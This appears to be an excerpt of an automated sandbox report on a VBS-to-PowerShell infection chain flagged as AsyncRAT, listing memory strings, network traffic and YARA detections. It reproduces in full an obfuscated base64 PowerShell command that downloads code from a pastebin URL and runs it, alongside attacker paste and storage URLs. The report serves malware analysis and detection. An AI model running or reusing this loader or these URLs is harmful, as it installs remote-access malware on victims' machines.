                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firebasestorage.googleapis.com
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp.txt?alt=media&token=
                Source: powershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firebasestorage.googleh
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D73E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/lHbHo/0
                Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/lHbHo/0P
                Source: powershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D675B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/V9y5Q5vv
                Source: powershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/cD7bJS7b
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sFgsbG3v
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.216.144.11:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.83:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2

                System Summary

                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects known downloader agent Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1020, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5368, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( 
[system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( 
[system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E56CD84_2_00007FF848E56CD8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F2144D4_2_00007FF848F2144D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_014A10087_2_014A1008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_014AD75C7_2_014AD75C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595B7A07_2_0595B7A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595C0707_2_0595C070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595B4587_2_0595B458
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595E7617_2_0595E761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_059573D07_2_059573D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F24487_2_067F2448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F15787_2_067F1578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F59487_2_067F5948
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F67907_2_067F6790
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848E86CD814_2_00007FF848E86CD8
